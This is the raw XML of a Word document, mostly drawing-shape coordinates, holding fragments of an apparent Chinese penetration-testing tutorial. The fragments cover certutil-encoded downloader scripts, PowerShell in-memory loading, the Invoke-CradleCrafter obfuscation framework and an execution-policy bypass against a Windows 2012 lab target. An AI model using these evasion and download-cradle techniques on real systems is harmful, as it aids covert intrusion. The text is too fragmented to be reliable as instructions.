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group style="position:absolute;margin-left:55.500pt;margin-top:310.500pt;width:246.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1110,6210" coordsize="4930,250">
        <v:shape style="position:absolute;left:1110;top:6210;width:4930;height:250" coordorigin="1110,6210" coordsize="4930,250" path="m1120,6237l1120,6237,1120,6237,1120,6237,1120,6237,1120,6237,1120,6237,1120,6237,1121,6237,1121,6237,1122,6237,1122,6237,1123,6237,1125,6237,1126,6237,1128,6237,1129,6237,1132,6237,1134,6237,1137,6237,1140,6237,1143,6237,1147,6237,1151,6237,1155,6237,1160,6237,1165,6237,1171,6237,1177,6237,1184,6237,1191,6237,1198,6237,1207,6237,1215,6237,1225,6237,1234,6237,1245,6237,1256,6237,1268,6237,1280,6237,1293,6237,1307,6237,1321,6237,1336,6237,1352,6237,1368,6237,1386,6237,1404,6237,1423,6237,1443,6237,1463,6237,1485,6237,1507,6237,1530,6237,1554,6237,1580,6237,1606,6237,1633,6237,1661,6237,1690,6237,1719,6237,1751,6237,1783,6237,1816,6237,1850,6237,1885,6237,1922,6237,1959,6237,1998,6237,2038,6237,2079,6237,2121,6237,2165,6237,2210,6237,2256,6237,2303,6237,2352,6237,2402,6237,2453,6237,2506,6237,2560,6237,2615,6237,2672,6237,2730,6237,2790,6237,2851,6237,2913,6237,2978,6237,3043,6237,3110,6237,3179,6237,3249,6237,3321,6237,3394,6237,3469,6237,3546,6237,3624,6237,3704,6237,3786,6237,3869,6237,3954,6237,4041,6237,4129,6237,4219,6237,4312,6237,4405,6237,4501,6237,4599,6237,4698,6237,4799,6237,4902,6237,5008,6237,5115,6237,5223,6237,5334,6237,5447,6237,5562,6237,5679,6237,5798,6237,5919,6237,6042,6237,6042,6237,6042,6237,6042,6237,6042,6237,6042,6237,6042,6237,6042,6237,6042,6237,6042,6237,6042,6237,6042,6237,6042,6237,6042,6237,6042,6237,6042,6238,6042,6238,6042,6238,6042,6238,6042,6238,6042,6238,6042,6238,6042,6238,6042,6239,6042,6239,6042,6239,6042,6239,6042,6239,6042,6240,6042,6240,6042,6240,6042,6241,6042,6241,6042,6242,6042,6242,6042,6242,6042,6243,6042,6243,6042,6244,6042,6244,6042,6245,6042,6246,6042,6246,6042,6247,6042,6248,6042,6249,6042,6249,6042,6250,6042,6251,6042,6252,6042,6253,6042,6254,6042,6255,6042,6256,6042,6257,6042,6258,6042,6259,6042,6261,6042,6262,6042,6263,6042,6265,6042,6266,6042,6267,6042,6269,6042,6271,6042,6272,6042,6274,6042,6276,6042,6277,6042,6279,6042,6281,6042,6283,6042,6285,6042,6287,6042,6289,6042,6291,6042,6293,6042,6296,6042,6298,6042,6301,6042,6303,6042,6306,6042,6308,6042,6311,6042,6314,6042,6316,6042,6319,6042,6322,6042,6325,6042,6328,6042,6331,6042,6335,6042,6338,6042,6341,6042,6345,6042,6348,6042,6352,6042,6355,6042,6359,6042,6363,6042,6367,6042,6371,6042,6375,6042,6379,6042,6383,6042,6387,6042,6392,6042,6396,6042,6401,6042,6405,6042,6410,6042,6415,6042,6420,6042,6425,6042,6430,6042,6435,6042,6440,6042,6446,6042,6451,6042,6457,6042,6462,6042,6462,6042,6462,6042,6462,6042,6462,6042,6462,6042,6462,6041,6462,6041,6462,6041,6462,6040,6462,6039,6462,6038,6462,6037,6462,6036,6462,6034,6462,6032,6462,6030,6462,6028,6462,6025,6462,6022,6462,6019,6462,6015,6462,6011,6462,6007,6462,6002,6462,5996,6462,5991,6462,5985,6462,5978,6462,5971,6462,5963,6462,5955,6462,5946,6462,5937,6462,5927,6462,5917,6462,5906,6462,5894,6462,5882,6462,5869,6462,5855,6462,5841,6462,5826,6462,5810,6462,5793,6462,5776,6462,5758,6462,5739,6462,5719,6462,5698,6462,5677,6462,5655,6462,5631,6462,5607,6462,5582,6462,5556,6462,5529,6462,5501,6462,5472,6462,5442,6462,5411,6462,5379,6462,5346,6462,5312,6462,5276,6462,5240,6462,5202,6462,5163,6462,5124,6462,5082,6462,5040,6462,4997,6462,4952,6462,4906,6462,4858,6462,4810,6462,4760,6462,4708,6462,4656,6462,4602,6462,4546,6462,4490,6462,4431,6462,4372,6462,4311,6462,4248,6462,4184,6462,4119,6462,4051,6462,3983,6462,3913,6462,3841,6462,3767,6462,3692,6462,3616,6462,3538,6462,3458,6462,3376,6462,3293,6462,3208,6462,3121,6462,3032,6462,2942,6462,2850,6462,2756,6462,2661,6462,2563,6462,2464,6462,2362,6462,2259,6462,2154,6462,2047,6462,1938,6462,1827,6462,1714,6462,1599,6462,1483,6462,1364,6462,1243,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6461,1120,6461,1120,6461,1120,6461,1120,6461,1120,6461,1120,6460,1120,6460,1120,6460,1120,6460,1120,6459,1120,6459,1120,6459,1120,6458,1120,6458,1120,6457,1120,6457,1120,6457,1120,6456,1120,6455,1120,6455,1120,6454,1120,6454,1120,6453,1120,6452,1120,6452,1120,6451,1120,6450,1120,6449,1120,6448,1120,6447,1120,6447,1120,6446,1120,6445,1120,6443,1120,6442,1120,6441,1120,6440,1120,6439,1120,6438,1120,6436,1120,6435,1120,6433,1120,6432,1120,6430,1120,6429,1120,6427,1120,6426,1120,6424,1120,6422,1120,6420,1120,6418,1120,6416,1120,6414,1120,6412,1120,6410,1120,6408,1120,6406,1120,6404,1120,6401,1120,6399,1120,6396,1120,6394,1120,6391,1120,6389,1120,6386,1120,6383,1120,6380,1120,6377,1120,6374,1120,6371,1120,6368,1120,6365,1120,6362,1120,6358,1120,6355,1120,6351,1120,6348,1120,6344,1120,6340,1120,6337,1120,6333,1120,6329,1120,6325,1120,6320,1120,6316,1120,6312,1120,6308,1120,6303,1120,6299,1120,6294,1120,6289,1120,6284,1120,6280,1120,6275,1120,6270,1120,6264,1120,6259,1120,6254,1120,6248,1120,6243,1120,6237e x" fillcolor="#f5f7f8" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:55.500pt;margin-top:330.500pt;width:120.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1110,6610" coordsize="2410,230">
        <v:shape style="position:absolute;left:1110;top:6610;width:2410;height:230" coordorigin="1110,6610" coordsize="2410,230" path="m1120,6627l1120,6627,1120,6627,1120,6627,1120,6627,1120,6627,1120,6627,1120,6627,1120,6627,1120,6627,1121,6627,1121,6627,1121,6627,1122,6627,1123,6627,1123,6627,1124,6627,1125,6627,1127,6627,1128,6627,1129,6627,1131,6627,1133,6627,1135,6627,1137,6627,1139,6627,1142,6627,1145,6627,1148,6627,1151,6627,1154,6627,1158,6627,1162,6627,1166,6627,1171,6627,1176,6627,1181,6627,1186,6627,1192,6627,1198,6627,1204,6627,1211,6627,1218,6627,1225,6627,1233,6627,1241,6627,1249,6627,1258,6627,1268,6627,1277,6627,1287,6627,1298,6627,1309,6627,1320,6627,1332,6627,1344,6627,1357,6627,1370,6627,1383,6627,1398,6627,1412,6627,1427,6627,1443,6627,1459,6627,1476,6627,1493,6627,1511,6627,1529,6627,1548,6627,1568,6627,1588,6627,1608,6627,1630,6627,1651,6627,1674,6627,1697,6627,1721,6627,1745,6627,1770,6627,1796,6627,1822,6627,1849,6627,1877,6627,1905,6627,1934,6627,1964,6627,1995,6627,2026,6627,2058,6627,2091,6627,2124,6627,2158,6627,2193,6627,2229,6627,2266,6627,2303,6627,2341,6627,2380,6627,2420,6627,2461,6627,2502,6627,2544,6627,2588,6627,2632,6627,2677,6627,2722,6627,2769,6627,2817,6627,2865,6627,2915,6627,2965,6627,3016,6627,3068,6627,3121,6627,3176,6627,3231,6627,3287,6627,3344,6627,3402,6627,3461,6627,3521,6627,3521,6627,3521,6627,3521,6627,3521,6627,3521,6627,3521,6627,3521,6627,3521,6627,3521,6627,3521,6627,3521,6627,3521,6628,3521,6628,3521,6628,3521,6628,3521,6628,3521,6628,3521,6628,3521,6628,3521,6628,3521,6628,3521,6629,3521,6629,3521,6629,3521,6629,3521,6629,3521,6630,3521,6630,3521,6630,3521,6631,3521,6631,3521,6631,3521,6632,3521,6632,3521,6633,3521,6633,3521,6634,3521,6634,3521,6635,3521,6635,3521,6636,3521,6637,3521,6637,3521,6638,3521,6639,3521,6640,3521,6640,3521,6641,3521,6642,3521,6643,3521,6644,3521,6645,3521,6646,3521,6647,3521,6648,3521,6650,3521,6651,3521,6652,3521,6653,3521,6655,3521,6656,3521,6658,3521,6659,3521,6661,3521,6662,3521,6664,3521,6666,3521,6668,3521,6669,3521,6671,3521,6673,3521,6675,3521,6677,3521,6679,3521,6681,3521,6684,3521,6686,3521,6688,3521,6691,3521,6693,3521,6696,3521,6698,3521,6701,3521,6704,3521,6707,3521,6709,3521,6712,3521,6715,3521,6718,3521,6722,3521,6725,3521,6728,3521,6731,3521,6735,3521,6738,3521,6742,3521,6746,3521,6749,3521,6753,3521,6757,3521,6761,3521,6765,3521,6769,3521,6773,3521,6778,3521,6782,3521,6786,3521,6791,3521,6796,3521,6800,3521,6805,3521,6810,3521,6815,3521,6820,3521,6825,3521,6831,3521,6836,3521,6841,3521,6847,3521,6852,3521,6852,3521,6852,3521,6852,3521,6852,3521,6852,3521,6852,3520,6852,3520,6852,3520,6852,3520,6852,3519,6852,3519,6852,3518,6852,3518,6852,3517,6852,3516,6852,3515,6852,3514,6852,3512,6852,3511,6852,3509,6852,3508,6852,3506,6852,3503,6852,3501,6852,3499,6852,3496,6852,3493,6852,3489,6852,3486,6852,3482,6852,3478,6852,3474,6852,3470,6852,3465,6852,3460,6852,3454,6852,3449,6852,3443,6852,3436,6852,3430,6852,3423,6852,3415,6852,3407,6852,3399,6852,3391,6852,3382,6852,3373,6852,3363,6852,3353,6852,3343,6852,3332,6852,3320,6852,3309,6852,3296,6852,3284,6852,3271,6852,3257,6852,3243,6852,3228,6852,3213,6852,3197,6852,3181,6852,3164,6852,3147,6852,3129,6852,3111,6852,3092,6852,3073,6852,3053,6852,3032,6852,3011,6852,2989,6852,2966,6852,2943,6852,2920,6852,2895,6852,2870,6852,2845,6852,2818,6852,2791,6852,2764,6852,2735,6852,2706,6852,2676,6852,2646,6852,2614,6852,2582,6852,2550,6852,2516,6852,2482,6852,2447,6852,2411,6852,2375,6852,2337,6852,2299,6852,2260,6852,2220,6852,2180,6852,2138,6852,2096,6852,2053,6852,2009,6852,1964,6852,1918,6852,1871,6852,1824,6852,1775,6852,1726,6852,1675,6852,1624,6852,1572,6852,1519,6852,1465,6852,1410,6852,1354,6852,1297,6852,1239,6852,1180,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6851,1120,6851,1120,6851,1120,6851,1120,6851,1120,6850,1120,6850,1120,6850,1120,6850,1120,6849,1120,6849,1120,6848,1120,6848,1120,6848,1120,6847,1120,6847,1120,6846,1120,6846,1120,6845,1120,6845,1120,6844,1120,6843,1120,6843,1120,6842,1120,6841,1120,6840,1120,6839,1120,6839,1120,6838,1120,6837,1120,6836,1120,6835,1120,6834,1120,6833,1120,6831,1120,6830,1120,6829,1120,6828,1120,6826,1120,6825,1120,6824,1120,6822,1120,6821,1120,6819,1120,6817,1120,6816,1120,6814,1120,6812,1120,6810,1120,6809,1120,6807,1120,6805,1120,6803,1120,6800,1120,6798,1120,6796,1120,6794,1120,6791,1120,6789,1120,6787,1120,6784,1120,6781,1120,6779,1120,6776,1120,6773,1120,6770,1120,6767,1120,6764,1120,6761,1120,6758,1120,6755,1120,6752,1120,6748,1120,6745,1120,6741,1120,6738,1120,6734,1120,6731,1120,6727,1120,6723,1120,6719,1120,6715,1120,6711,1120,6706,1120,6702,1120,6698,1120,6693,1120,6689,1120,6684,1120,6679,1120,6675,1120,6670,1120,6665,1120,6660,1120,6655,1120,6649,1120,6644,1120,6638,1120,6633,1120,6627e x" fillcolor="#f5f7f8" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:345.600pt;width:467.400pt;height:64.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId7" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:429.600pt;width:467.400pt;height:239.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId8" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:115.500pt;margin-top:756.500pt;width:156.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2310,15130" coordsize="3130,270">
        <v:shape style="position:absolute;left:2310;top:15130;width:3130;height:270" coordorigin="2310,15130" coordsize="3130,270" path="m2320,15152l2320,15152,2320,15152,2320,15152,2320,15152,2320,15152,2320,15152,2321,15152,2321,15152,2321,15152,2322,15152,2322,15152,2323,15152,2323,15152,2324,15152,2325,15152,2326,15152,2328,15152,2329,15152,2331,15152,2333,15152,2335,15152,2337,15152,2340,15152,2343,15152,2346,15152,2349,15152,2353,15152,2357,15152,2361,15152,2365,15152,2370,15152,2375,15152,2381,15152,2387,15152,2393,15152,2400,15152,2407,15152,2414,15152,2422,15152,2430,15152,2439,15152,2448,15152,2457,15152,2467,15152,2478,15152,2489,15152,2500,15152,2512,15152,2525,15152,2538,15152,2552,15152,2566,15152,2581,15152,2596,15152,2612,15152,2628,15152,2645,15152,2663,15152,2682,15152,2701,15152,2720,15152,2741,15152,2762,15152,2783,15152,2806,15152,2829,15152,2853,15152,2877,15152,2903,15152,2929,15152,2956,15152,2983,15152,3012,15152,3041,15152,3071,15152,3102,15152,3133,15152,3166,15152,3199,15152,3233,15152,3269,15152,3305,15152,3342,15152,3379,15152,3418,15152,3458,15152,3498,15152,3540,15152,3583,15152,3626,15152,3671,15152,3716,15152,3763,15152,3810,15152,3859,15152,3908,15152,3959,15152,4011,15152,4064,15152,4118,15152,4173,15152,4229,15152,4286,15152,4344,15152,4404,15152,4465,15152,4526,15152,4589,15152,4654,15152,4719,15152,4786,15152,4854,15152,4923,15152,4993,15152,5065,15152,5137,15152,5212,15152,5287,15152,5364,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15153,5442,15153,5442,15153,5442,15153,5442,15153,5442,15153,5442,15154,5442,15154,5442,15154,5442,15155,5442,15155,5442,15155,5442,15156,5442,15156,5442,15157,5442,15157,5442,15158,5442,15158,5442,15159,5442,15159,5442,15160,5442,15161,5442,15161,5442,15162,5442,15163,5442,15164,5442,15165,5442,15165,5442,15166,5442,15167,5442,15168,5442,15169,5442,15171,5442,15172,5442,15173,5442,15174,5442,15175,5442,15177,5442,15178,5442,15180,5442,15181,5442,15183,5442,15184,5442,15186,5442,15188,5442,15189,5442,15191,5442,15193,5442,15195,5442,15197,5442,15199,5442,15201,5442,15204,5442,15206,5442,15208,5442,15211,5442,15213,5442,15216,5442,15218,5442,15221,5442,15223,5442,15226,5442,15229,5442,15232,5442,15235,5442,15238,5442,15241,5442,15245,5442,15248,5442,15251,5442,15255,5442,15258,5442,15262,5442,15266,5442,15270,5442,15273,5442,15277,5442,15281,5442,15286,5442,15290,5442,15294,5442,15299,5442,15303,5442,15308,5442,15312,5442,15317,5442,15322,5442,15327,5442,15332,5442,15337,5442,15342,5442,15348,5442,15353,5442,15359,5442,15364,5442,15370,5442,15376,5442,15382,5442,15388,5442,15394,5442,15400,5442,15407,5442,15407,5442,15407,5442,15407,5442,15407,5442,15407,5442,15407,5441,15407,5441,15407,5441,15407,5440,15407,5440,15407,5439,15407,5439,15407,5438,15407,5437,15407,5435,15407,5434,15407,5433,15407,5431,15407,5429,15407,5427,15407,5425,15407,5422,15407,5419,15407,5416,15407,5413,15407,5409,15407,5405,15407,5401,15407,5397,15407,5392,15407,5387,15407,5381,15407,5375,15407,5369,15407,5362,15407,5355,15407,5348,15407,5340,15407,5332,15407,5323,15407,5314,15407,5305,15407,5294,15407,5284,15407,5273,15407,5261,15407,5249,15407,5237,15407,5224,15407,5210,15407,5196,15407,5181,15407,5166,15407,5150,15407,5134,15407,5116,15407,5099,15407,5080,15407,5061,15407,5042,15407,5021,15407,5000,15407,4979,15407,4956,15407,4933,15407,4909,15407,4885,15407,4859,15407,4833,15407,4806,15407,4779,15407,4750,15407,4721,15407,4691,15407,4660,15407,4629,15407,4596,15407,4563,15407,4528,15407,4493,15407,4457,15407,4420,15407,4383,15407,4344,15407,4304,15407,4264,15407,4222,15407,4179,15407,4136,15407,4091,15407,4046,15407,3999,15407,3952,15407,3903,15407,3854,15407,3803,15407,3751,15407,3698,15407,3644,15407,3589,15407,3533,15407,3476,15407,3418,15407,3358,15407,3297,15407,3236,15407,3172,15407,3108,15407,3043,15407,2976,15407,2908,15407,2839,15407,2769,15407,2697,15407,2624,15407,2550,15407,2475,15407,2398,15407,2320,15407,2320,15407,2320,15407,2320,15407,2320,15407,2320,15407,2320,15407,2320,15407,2320,15407,2320,15407,2320,15407,2320,15407,2320,15407,2320,15407,2320,15406,2320,15406,2320,15406,2320,15406,2320,15406,2320,15406,2320,15406,2320,15406,2320,15405,2320,15405,2320,15405,2320,15405,2320,15404,2320,15404,2320,15404,2320,15403,2320,15403,2320,15403,2320,15402,2320,15402,2320,15401,2320,15401,2320,15400,2320,15400,2320,15399,2320,15398,2320,15398,2320,15397,2320,15396,2320,15396,2320,15395,2320,15394,2320,15393,2320,15392,2320,15391,2320,15390,2320,15389,2320,15388,2320,15387,2320,15385,2320,15384,2320,15383,2320,15382,2320,15380,2320,15379,2320,15377,2320,15376,2320,15374,2320,15372,2320,15371,2320,15369,2320,15367,2320,15365,2320,15363,2320,15361,2320,15359,2320,15357,2320,15355,2320,15353,2320,15350,2320,15348,2320,15345,2320,15343,2320,15340,2320,15338,2320,15335,2320,15332,2320,15329,2320,15326,2320,15323,2320,15320,2320,15317,2320,15314,2320,15310,2320,15307,2320,15304,2320,15300,2320,15296,2320,15293,2320,15289,2320,15285,2320,15281,2320,15277,2320,15273,2320,15269,2320,15264,2320,15260,2320,15255,2320,15251,2320,15246,2320,15241,2320,15236,2320,15232,2320,15226,2320,15221,2320,15216,2320,15211,2320,15205,2320,15200,2320,15194,2320,15188,2320,15182,2320,15177,2320,15170,2320,15164,2320,15158,2320,15152e x" fillcolor="#f7f0f3" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group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第八季中提到了cer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tutil的加密与解密。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38" w:firstLine="0"/>
      </w:pP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C:\&gt;certutil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-encode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2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>c:\downfile.vbs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> 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downfile.bat，而配合powershell的内存加载，则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可把cer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tutil发挥更强大。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8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>靶机：windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-51"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2012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4149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而今天需要的是一款p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owershell的混淆框架的配合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>https://github.com/danielbo</w:t>
      </w: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hannon/Invoke-CradleCrafter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>使</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>用方法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="18" w:after="0" w:line="327" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="5775" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="22282c"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Import-Module</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:spacing w:val="-40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="22282c"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>./Invoke-CradleCrafter.psd1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="22282c"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Invoke-Cradl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="22282c"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eCrafter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67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2424" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>如果在加载powershell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脚本的时候提示：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-36"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>进行数字签运行该脚本。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则先执行：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="c5234d"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>set-executionpolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="c5234d"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Bypass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group style="position:absolute;margin-left:74.500pt;margin-top:112.500pt;width:449.500pt;height:47.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2250" coordsize="8990,950">
        <v:shape style="position:absolute;left:1490;top:2250;width:8990;height:950" coordorigin="1490,2250" coordsize="8990,950" path="m1510,2260l1510,2260,1510,2260,1510,2260,1510,2260,1510,2260,1510,2260,1511,2260,1512,2260,1512,2260,1514,2260,1515,2260,1517,2260,1519,2260,1521,2260,1524,2260,1528,2260,1532,2260,1536,2260,1541,2260,1546,2260,1552,2260,1559,2260,1566,2260,1575,2260,1583,2260,1593,2260,1603,2260,1615,2260,1627,2260,1640,2260,1654,2260,1668,2260,1684,2260,1701,2260,1719,2260,1738,2260,1758,2260,1780,2260,1802,2260,1826,2260,1851,2260,1877,2260,1904,2260,1933,2260,1963,2260,1995,2260,2028,2260,2063,2260,2099,2260,2136,2260,2175,2260,2216,2260,2259,2260,2303,2260,2348,2260,2396,2260,2445,2260,2496,2260,2549,2260,2604,2260,2660,2260,2719,2260,2779,2260,2841,2260,2906,2260,2972,2260,3041,2260,3112,2260,3184,2260,3259,2260,3336,2260,3416,2260,3498,2260,3582,2260,3668,2260,3757,2260,3848,2260,3941,2260,4037,2260,4136,2260,4236,2260,4340,2260,4446,2260,4555,2260,4666,2260,4780,2260,4897,2260,5017,2260,5139,2260,5264,2260,5392,2260,5523,2260,5657,2260,5793,2260,5933,2260,6076,2260,6222,2260,6370,2260,6522,2260,6677,2260,6835,2260,6997,2260,7161,2260,7329,2260,7500,2260,7675,2260,7853,2260,8034,2260,8219,2260,8407,2260,8598,2260,8793,2260,8992,2260,9194,2260,9400,2260,9609,2260,9823,2260,10039,2260,10260,2260,10484,2260,10484,2260,10484,2260,10484,2260,10484,2260,10484,2260,10484,2260,10484,2260,10484,2260,10484,2260,10484,2261,10484,2261,10484,2261,10484,2261,10484,2261,10484,2262,10484,2262,10484,2262,10484,2263,10484,2263,10484,2264,10484,2265,10484,2265,10484,2266,10484,2267,10484,2268,10484,2269,10484,2270,10484,2271,10484,2272,10484,2274,10484,2275,10484,2277,10484,2279,10484,2280,10484,2282,10484,2284,10484,2286,10484,2289,10484,2291,10484,2293,10484,2296,10484,2299,10484,2302,10484,2305,10484,2308,10484,2311,10484,2315,10484,2318,10484,2322,10484,2326,10484,2330,10484,2335,10484,2339,10484,2344,10484,2348,10484,2353,10484,2359,10484,2364,10484,2370,10484,2375,10484,2381,10484,2387,10484,2394,10484,2400,10484,2407,10484,2414,10484,2421,10484,2429,10484,2437,10484,2444,10484,2453,10484,2461,10484,2470,10484,2478,10484,2487,10484,2497,10484,2506,10484,2516,10484,2526,10484,2537,10484,2547,10484,2558,10484,2569,10484,2581,10484,2593,10484,2605,10484,2617,10484,2630,10484,2642,10484,2656,10484,2669,10484,2683,10484,2697,10484,2711,10484,2726,10484,2741,10484,2757,10484,2772,10484,2788,10484,2805,10484,2821,10484,2838,10484,2856,10484,2873,10484,2891,10484,2910,10484,2928,10484,2947,10484,2967,10484,2987,10484,3007,10484,3027,10484,3048,10484,3070,10484,3091,10484,3113,10484,3136,10484,3159,10484,3182,10484,3206,10484,3206,10484,3206,10484,3206,10484,3206,10484,3206,10484,3206,10483,3206,10482,3206,10482,3206,10480,3206,10479,3206,10477,3206,10475,3206,10473,3206,10470,3206,10466,3206,10462,3206,10458,3206,10453,3206,10448,3206,10442,3206,10435,3206,10428,3206,10419,3206,10411,3206,